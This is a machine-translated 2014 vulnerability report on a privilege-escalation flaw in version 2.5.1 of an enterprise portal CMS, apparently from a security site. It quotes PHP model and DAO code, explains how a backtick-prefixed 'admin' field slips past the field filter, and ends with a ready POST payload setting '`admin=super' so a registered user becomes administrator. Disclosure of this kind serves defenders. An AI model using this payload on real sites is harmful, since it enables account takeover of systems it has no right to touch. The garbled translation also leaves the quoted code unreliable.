Cicada-known Enterprise Portal system v2. 5. 1 to bypass the patch to continue injection-vulnerability warning-the black bar safety net

2014-10-03T00:00:00
ID MYHACK58:62201454276
Type myhack58
Reporter 佚名
Modified 2014-10-03T00:00:00

Description

/system/module/user/model.php

public function update($account)

{

/ If the user want to change his password. /

if($this->post->password1 != false)

{

$this->checkPassword();

if(dao::isError()) return false;

$password = $this->createPassword($this->post->password1, $account);

$this->post->set('password', $password);

}

$user = fixer::input('post')

->cleanInt('imobile, qq, zipcode')

->setDefault('admin', 'no')

->remove('ip, account, join, visits')

->removeIF(RUN_MODE != 'admin', 'admin')

->get();

return $this->the dao->update(TABLE_USER)

->data($user, $skip = 'password1,password2')

->autoCheck()

->batchCheck($this->config->user->require->edit, 'notempty')

->check('email', 'email')

->check('email', 'unique', "account!='$ account'")

->checkIF($this->post->gtalk != false, 'gtalk', 'email')

->where('account')->eq($account)

->exec();

}

Was this class the admin field were detected

See

/system/lib/dao/dao.class.php

The data()

*/

public function data($data, $skipFields = ")

{

$this->data = $data;

if($skipFields) $skipFields = ',' . str_replace(' ', ", $skipFields) . ',';

foreach($data as $field => $value)

{

$field = str_replace("', ", $field);

$field = str_replace(',', ", $field);

if(strpos($skipFields, ",$field,") !== false) continue;

$this->sql .= "$field = " . $this->quote($value) . ',';

}

$this->sql = rtrim($this->sql, ','); // Remove the last ','.

return $this;

}

Removed the `This symbol

We submitted admin bypass the detection, and then into the data()after the Removeagain is reduced,

Lead administrator elevation of Privilege

Registered user to modify the information post

realname=aaaaaa'&email=z%40qq. com&password1=&password2=&company=&address=&zipcode=&mobile=&phone=&`admin=super

Can be raised to administrator